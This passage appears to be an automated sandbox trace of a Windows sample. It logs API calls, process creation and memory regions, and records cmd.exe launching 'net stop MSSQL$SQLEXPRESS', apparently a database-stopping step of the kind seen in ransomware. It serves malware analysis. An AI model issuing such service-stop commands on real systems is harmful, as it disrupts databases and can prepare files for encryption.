lpLCData=0x483fb68, cchData=128 | out: lpLCData="1") returned 2 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0128.140] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0128.140] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.141] GetConsoleTitleW (in: lpConsoleTitle=0x4afa9e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.141] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0128.142] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0128.142] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0128.142] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0128.142] _wcsicmp (_String1="net", _String2=")") returned 69 [0128.142] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0128.142] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0128.142] _wcsicmp (_String1="IF", _String2="net") returned -5 [0128.142] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0128.142] _wcsicmp (_String1="REM", _String2="net") returned 4 [0128.142] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0128.143] GetConsoleTitleW (in: lpConsoleTitle=0x483f850, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.143] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0128.143] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0128.143] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0128.143] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0128.143] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0128.143] _wcsicmp (_String1="net", _String2="CD") returned 11 [0128.143] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0128.143] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0128.143] _wcsicmp (_String1="net", _String2="REN") returned -4 [0128.143] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0128.143] _wcsicmp (_String1="net", _String2="SET") returned -5 [0128.143] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0128.143] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0128.143] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0128.143] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0128.143] _wcsicmp (_String1="net", _String2="MD") returned 1 [0128.143] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0128.143] _wcsicmp (_String1="net", _String2="RD") returned -4 [0128.143] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0128.143] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0128.143] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0128.143] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0128.143] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0128.144] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0128.144] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0128.144] _wcsicmp (_String1="net", _String2="VER") returned -8 [0128.144] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0128.144] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0128.144] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0128.144] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0128.144] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0128.144] _wcsicmp (_String1="net", _String2="START") returned -5 [0128.144] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0128.144] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0128.144] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0128.144] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0128.144] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0128.144] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0128.144] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0128.144] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0128.144] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0128.144] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0128.144] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0128.144] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0128.144] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0128.144] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0128.144] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0128.144] _wcsicmp (_String1="net", _String2="CD") returned 11 [0128.144] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0128.144] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0128.144] _wcsicmp (_String1="net", _String2="REN") returned -4 [0128.144] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0128.144] _wcsicmp (_String1="net", _String2="SET") returned -5 [0128.144] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0128.144] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0128.144] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0128.144] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0128.144] _wcsicmp (_String1="net", _String2="MD") returned 1 [0128.144] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0128.144] _wcsicmp (_String1="net", _String2="RD") returned -4 [0128.144] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0128.144] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0128.144] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0128.144] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0128.144] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0128.144] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0128.144] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0128.144] _wcsicmp (_String1="net", _String2="VER") returned -8 [0128.144] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0128.144] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0128.144] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0128.144] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0128.144] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0128.144] _wcsicmp (_String1="net", _String2="START") returned -5 [0128.144] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0128.144] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0128.144] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0128.144] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0128.145] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0128.145] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0128.145] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0128.145] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0128.145] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0128.145] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0128.145] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0128.145] _wcsicmp (_String1="net", _String2="IF") returned 5 [0128.145] _wcsicmp (_String1="net", _String2="REM") returned -4 [0128.145] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0128.145] SetErrorMode (uMode=0x0) returned 0x0 [0128.145] SetErrorMode (uMode=0x1) returned 0x0 [0128.145] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4af05d0, lpFilePart=0x483f35c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x483f35c*="Desktop") returned 0x1d [0128.145] SetErrorMode (uMode=0x0) returned 0x1 [0128.145] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0128.145] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.153] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.153] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.153] GetConsoleTitleW (in: lpConsoleTitle=0x483f5dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.153] InitializeProcThreadAttributeList (in: lpAttributeList=0x483f508, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x483f4ec | out: lpAttributeList=0x483f508, lpSize=0x483f4ec) returned 1 [0128.153] UpdateProcThreadAttribute (in: lpAttributeList=0x483f508, dwFlags=0x0, Attribute=0x60001, lpValue=0x483f4f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x483f508, lpPreviousValue=0x0) returned 1 [0128.153] GetStartupInfoW (in: lpStartupInfo=0x483f540 | out: lpStartupInfo=0x483f540*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0128.153] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0128.154] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0128.154] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0128.154] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0128.154] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0128.154] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0128.154] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0128.154] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.154] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0128.154] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0128.154] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0128.154] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0128.154] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.155] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$SQLEXPRESS", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x483f490*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$SQLEXPRESS", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x483f4dc | out: lpCommandLine="net stop MSSQL$SQLEXPRESS", lpProcessInformation=0x483f4dc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd0c, dwThreadId=0xe4c)) returned 1 [0128.160] CloseHandle (hObject=0xa4) returned 1 [0128.160] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.160] GetEnvironmentStringsW () returned 0x4af9ed0* [0128.160] FreeEnvironmentStringsA (penv="=") returned 1 [0128.160] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0128.325] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x483f474 | out: lpExitCode=0x483f474*=0x2) returned 1 [0128.325] CloseHandle (hObject=0xa8) returned 1 [0128.325] _vsnwprintf (in: _Buffer=0x483f55c, _BufferCount=0x13, _Format="%08X", _ArgList=0x483f47c | out: _Buffer="00000002") returned 8 [0128.325] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0128.325] GetEnvironmentStringsW () returned 0x4afb3c0* [0128.325] FreeEnvironmentStringsA (penv="=") returned 1 [0128.325] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0128.325] GetEnvironmentStringsW () returned 0x4afb3c0* [0128.325] FreeEnvironmentStringsA (penv="=") returned 1 [0128.325] DeleteProcThreadAttributeList (in: lpAttributeList=0x483f508 | out: lpAttributeList=0x483f508) [0128.325] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.325] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0128.325] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.325] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0128.326] _get_osfhandle (_FileHandle=0) returned 0x38 [0128.326] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0128.326] SetConsoleInputExeNameW () returned 0x1 [0128.326] GetConsoleOutputCP () returned 0x1b5 [0128.326] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0128.326] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.326] exit (_Code=2) Thread: id = 397 os_tid = 0x2ec Process: id = "103" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x250da000" os_pid = "0xa24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "102" os_parent_pid = "0xe24" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6188 start_va = 0x7fb36000 end_va = 0x7fb36fff entry_point = 0x0 region_type = private name = "private_0x000000007fb36000" filename = "" Region: id = 6189 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6190 start_va = 0xfe8ebe0000 end_va = 0xfe8ebfffff entry_point = 0x0 region_type = private name = "private_0x000000fe8ebe0000" filename = "" Region: id = 6191 start_va = 0xfe8ec00000 end_va = 0xfe8ec13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fe8ec00000" filename = "" Region: id = 6192 start_va = 0xfe8ec20000 end_va = 0xfe8ec5ffff entry_point = 0x0 region_type = private name = "private_0x000000fe8ec20000" filename = "" Region: id = 6193 start_va = 0x7df5ff200000 end_va = 0x7ff5ff1fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff200000" filename = "" Region: id = 6194 start_va = 0x7ff6c40d0000 end_va = 0x7ff6c40f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c40d0000" filename = "" Region: id = 6195 start_va = 0x7ff6c40f6000 end_va = 0x7ff6c40f6fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c40f6000" filename = "" Region: id = 6196 start_va = 0x7ff6c40fe000 end_va = 0x7ff6c40fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c40fe000" filename = "" Region: id = 6197 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6198 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6199 start_va = 0xfe8ebe0000 end_va = 0xfe8ebeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fe8ebe0000" filename = "" Region: id = 6200 start_va = 0xfe8ebf0000 end_va = 0xfe8ebf6fff entry_point = 0x0 region_type = private name = "private_0x000000fe8ebf0000" filename = "" Region: id = 6201 start_va = 0xfe8ec60000 end_va = 0xfe8ed1dfff entry_point = 0xfe8ec60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6202 start_va = 0xfe8ed20000 end_va = 0xfe8ed5ffff entry_point = 0x0 region_type = private name = "private_0x000000fe8ed20000" filename = "" Region: id = 6203 start_va = 0xfe8ed60000 end_va = 0xfe8ee5ffff entry_point = 0x0 region_type = private name = "private_0x000000fe8ed60000" filename = "" Region: id = 6204 start_va = 0xfe8ee60000 end_va = 0xfe8ee60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fe8ee60000" filename = "" Region: id = 6205 start_va = 0xfe8ee70000 end_va = 0xfe8ee76fff entry_point = 0x0 region_type = private name = "private_0x000000fe8ee70000" filename = "" Region: id = 6206 start_va = 0xfe8ee80000 end_va = 0xfe8ee80fff entry_point = 0x0 region_type = private name = "private_0x000000fe8ee80000" filename = "" Region: id = 6207 start_va = 0xfe8ee90000 end_va = 0xfe8ee90fff entry_point = 0x0 region_type = private name = "private_0x000000fe8ee90000" filename = "" Region: id = 6208 start_va = 0xfe8ef50000 end_va = 0xfe8ef5ffff entry_point = 0x0 region_type = private name = "private_0x000000fe8ef50000" filename = "" Region: id = 6209 start_va = 0xfe8ef60000 end_va = 0xfe8f0e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fe8ef60000" filename = "" Region: id = 6210 start_va = 0xfe8f0f0000 end_va = 0xfe8f270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fe8f0f0000" filename = "" Region: id = 6211 start_va = 0xfe8f280000 end_va = 0xfe9067ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fe8f280000" filename = "" Region: id = 6212 start_va = 0x7ff6c3fd0000 end_va = 0x7ff6c40cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3fd0000" filename = "" Region: id = 6213 start_va = 0x7ff6c40fc000 end_va = 0x7ff6c40fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c40fc000" filename = "" Region: id = 6214 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6215 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6216 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6217 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6218 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6219 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6220 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6221 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6222 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6223 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6224 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6225 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6226 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6227 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 394 os_tid = 0x354 Thread: id = 395 os_tid = 0x9c8 Thread: id = 396 os_tid = 0x718 Process: id = "104" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x256d8000" os_pid = "0xd0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "102" os_parent_pid = "0xe24" cmd_line = "net stop MSSQL$SQLEXPRESS" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6241 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 6242 start_va = 0xb70000 end_va = 0x4b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 6243 start_va = 0x4b70000 end_va = 0x4b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b70000" filename = "" Region: id = 6244 start_va = 0x4b90000 end_va = 0x4b91fff entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 6245 start_va = 0x4ba0000 end_va = 0x4bb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ba0000" filename = "" Region: id = 6246 start_va = 0x4bc0000 end_va = 0x4bfffff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 6247 start_va = 0x4c00000 end_va = 0x4c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 6248 start_va = 0x4c80000 end_va = 0x4c83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c80000" filename = "" Region: id = 6249 start_va = 0x4c90000 end_va = 0x4c90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c90000" filename = "" Region: id = 6250 start_va = 0x4ca0000 end_va = 0x4ca1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 6251 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: 